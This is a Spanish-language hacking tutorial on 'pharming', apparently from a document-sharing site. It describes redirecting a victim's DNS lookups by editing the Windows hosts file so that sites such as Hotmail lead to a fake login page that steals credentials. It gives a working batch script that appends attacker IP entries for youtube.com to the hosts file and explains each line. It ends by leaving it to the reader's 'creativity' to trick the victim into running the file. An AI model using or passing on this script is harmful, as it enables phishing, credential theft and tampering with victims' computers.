Professional Documents
Culture Documents
Tutorial : Pharming
Sistema Operativo : Windows 98/XP/Vista/7
Tipo de archivo : PDF
Conocimientos necesarios : BATCH/CMD
Autor : Catemaco Rock (catemaco.rock@rocketmail.com)
Introducción:
El Pharming es una técnica hacker mediante la cual el usuario modifica los hosts de la computadora
víctima, mediante esta técnica los DNS son modificados en la misma computadora para que se dirijan
hacia IP’s distintas a las correspondientes.
La importancia de esta técnica reside en que es tan solo otra manera de facilitar el Phishing.
Ejemplo:
2.- En este host tengo un index que simula ser una página de Hotmail, pero este index solo roba los
datos de inicio de sesión.
4.- Vulnero la PC de mi víctima, modifico los hosts e implanto la IP de mi host con el DNS de Hotmail.
5.- Cuando la víctima entre a Hotmail el dominio aparecerá como: www.hotmail.com ,pero estará
entrando a la ip de mi host (xxx.xxx.xxx.xxx)
Nota: En este tutorial se explicara el proceso de cómo modificar los hosts de una PC mediante un
archivo BATCH con privilegios de administrador. (Solo con privilegios de administrador funciona)
http://www.mayanteam.net
2
Detalles:
1.- La localización del archivo depende del idioma y configuración de cada computadora pero
normalmente sigue el siguiente patrón: C:\Windows\System32\drivers\etc\hosts
2.- Para que funcione, se necesita ejecutar el batch con permisos de administrador.
Proceso:
Nota: Debido a que este tutorial solo explica el proceso de cómo modificar los hosts se usaran páginas
cualquiera para ejemplificar el proceso.
1.- Conocer la IP de nuestro HOST con el índex scam o cualquier host que queramos que reemplace la ip
original del dominio que modificaremos.
Abrir CMD.
Escribir “Ping” seguido del nombre del dominio de nuestro host.
Copiar la IP que aparece.
2.- Saber que dominio queremos modificar (en nuestro caso será www.youtube.com).
@echo off
echo 173.192.60.242 www.youtube.com >> %windir%\system32\drivers\etc\hosts
echo 173.192.60.242 youtube.com >> %windir%\system32\drivers\etc\hosts
echo 173.192.60.242 http://www.youtube.com >> %windir%\system32\drivers\etc\hosts
pause>nul
http://www.mayanteam.net
3
El comando “@echo off” hace que a la hora de ejecutarse el batch solo se muestren los
resultados y no los comandos.
“echo” está poniendo los datos que le siguen (ip + dominio)
“>>” está dirigiendo la edición a un archivo especifico del computador.
“%windir%” representa el directorio de Windows en cualquier PC.
Se repite 3 veces, modificando el subdominio. (para que de cualquier forma la victima entre a la
ip ya mencionada)
“Pause>nul” simplemente para la acción y el “nul” esconde el mensaje nato del comando
“Pause”
4.- Salvar el archivo como sea pero que la extensión sea “.bat”
De su creatividad dependerá como hacer que la victima ejecute el archivo, espero que les haya servido.
http://www.mayanteam.net